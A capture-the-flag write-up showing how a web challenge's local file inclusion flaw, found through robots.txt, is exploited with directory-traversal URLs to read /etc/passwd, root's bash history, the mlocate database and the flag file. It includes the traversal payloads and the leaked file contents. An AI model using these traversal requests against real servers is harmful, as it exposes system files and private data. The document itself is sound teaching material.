State of the art
A nice cyber-hacker-haxxor-website-of-death containing a magical robots.txt
file:
1
2
| User-agent: *
Disallow: /notinterestingfile.php
|
Local file include
Let’s try something:
https://web075-sysia.challenge-ecw.fr/notinterestingfile.php?page=../../../../../../../etc/passwd
1
| root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12:man:/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync❌100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network❌101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve❌102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy❌103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt❌104:65534::/nonexistent:/bin/false
|
Ok, it works, there is only one user with a /bin/bash. I can’t display any other web page via LFI, I think I’ll try to display the .bash_history
:
https://web075-sysia.challenge-ecw.fr/notinterestingfile.php?page=../../../../../../../root/.bash_history
It worked (I will just put a snippet below because it’s veeeeery long):
1
2
3
4
5
6
7
8
9
10
11
| docker exec -it CTFd_NDH_2018 /bin/sh
ll
mkdir ndh
cd ndh/
locate flag.txt
updatedb
locate flag.txt
ll
nano Dockerfile
nano proxy.py
docker build . -n CTFd_ndh
|
Flag location
Ok, he did an updatedb
, so the location of flag.txt
is stored in this database. The default path is: /var/lib/mlocate/mlocate.db
https://web075-sysia.challenge-ecw.fr/notinterestingfile.php?page=../../../../../../../var/lib/mlocate/mlocate.db
Flag
https://web075-sysia.challenge-ecw.fr/notinterestingfile.php?page=../../../../../../../var/www/ECW/solution/web/lfi/flag.txt